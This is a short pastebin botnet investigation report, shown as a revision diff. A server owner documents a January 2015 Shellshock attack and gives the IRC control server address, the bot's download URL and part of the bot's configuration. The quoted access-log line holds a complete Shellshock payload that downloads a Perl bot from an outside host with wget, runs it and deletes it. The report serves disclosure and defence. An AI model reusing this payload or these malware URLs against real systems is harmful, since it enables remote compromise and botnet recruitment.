SHOW:
|
|
- or go back to the newest paste.
| 1 | http://pastebin.com/SPMkyZ4w - saga continues.. (: | |
| 2 | _____________________________________ | |
| 3 | [```` BOTNET INVESTIGATION REPORT ````] | |
| 4 | ````````````````````````````````````` | |
| 5 | ||
| 6 | - | Date: January 06, 2015 |
| 6 | + | Date: January 16, 2015 |
| 7 | Botnet type: IRC Bots/Malware | |
| 8 | Botnet control server IP: 64.32.12.57 (Sharktech.net) | |
| 9 | Protocol: IRC | |
| 10 | Port: 80 ( /connect 64.32.12.57 80 -j #new ) | |
| 11 | Hacked hosts: >500 | |
| 12 | Previous report of the same botnet: http://pastebin.com/DabxDiwm , http://pastebin.com/SPMkyZ4w | |
| 13 | Bot url: http://74.208.166.12/bot.txt (mirror: http://pastebin.com/Zbkke58A) | |
| 14 | (u17173405.onlinehome-server.com Numerical: 74.208.166.12) | |
| 15 | ||
| 16 | Access log: | |
| 17 | 217.114.212.26 - - [16/Jan/2015:15:46:35 -0500] "GET /phppath/cgi_wrapper HTTP/1.0" 404 162 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESSX\x22;system(\x22wget http://74.208.166.12/bot.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\x22);'"
| |
| 18 | ||
| 19 | ||
| 20 | We can clearly see that this is a shell-shock exploitation try and the source code is here: | |
| 21 | http://74.208.166.12/bot.txt ( MIRROR: http://pastebin.com/Zbkke58A ) | |
| 22 | ||
| 23 | From the source code we can clearly see that this is an IRC bot that connects to a following server: | |
| 24 | $servidor='64.32.12.57' unless $servidor; | |
| 25 | my $porta='80'; | |
| 26 | my @canais=("#new");
| |
| 27 | my @adms=("X","Y");
| |
| 28 | my @auth=("*!*@evil");
| |
| 29 | ||
| 30 | Hey, whoever you are, it's a third time I reporting you to the public, maybe you'll stop attacking my server? I see you are enjoying everyone using your botnet :-) Good luck. |
